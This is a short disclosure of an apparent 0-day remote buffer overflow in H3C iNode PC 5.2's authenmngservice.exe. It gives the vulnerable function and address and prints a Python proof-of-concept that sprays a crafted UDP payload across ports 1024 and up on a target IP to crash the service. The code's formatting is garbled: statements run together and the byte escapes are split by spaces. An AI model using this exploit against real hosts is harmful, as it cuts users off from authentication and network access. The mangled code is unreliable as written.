INode Remote Buffer Overflow Denial of Service 0 day

H3C iNode is a management software designed and developed by Hangzhou H3C Communication Technology Co., Ltd. for user authentication and internet access. The software has a buffer overflow vulnerability. Attackers can remotely send attack packets and trigger vulnerability overflow, this causes a denial of service.
The vulnerability exists in the authenmngservice.exe file behind inodesoftware installation. It is registered as a service program and runs as an administrator to receive udp packets sent over the network. Taking the latest iNode PC 5.2 (E0402) as an example, the vulnerability is located in the sub_459F10 function of IDA disassembly result. The vulnerability location is the memory copy function at 0x45A2E2, and the copy data length field is controllable, remote denial-of-service attacks can be caused by malformed data. The poc. py code is as follows:

Import socketimport timeExploit_addr = raw_input ("input attack ip addr:") s = socket. socket (socket. AF_INET, socket. SOCK_DGRAM) exploit_data = '\ x00 \ x01' + 'A' * 14 + '\ x74 \ x02 \ x64 \ x72 \ x1D \ xA7 \ x9C \ xC1 \ xBF \ xBA \ x86 \ x4C \ x57 \ xEF \ xCB \ x78 '+' \ x3D \ x01 \ x01 \ x11 \ x01 'for port in range (1024,655 35): address = (Exploit_addr, port) s. sendto (exploit_data, address) print 'port: ', porttime. sleep (0.001) s. close () print 'ploit end' raw _ input ()

 

Same as previous submitted vulnerabilities (http://www.bkjia.com/Article/201307/227180.html ). However, no code can be executed.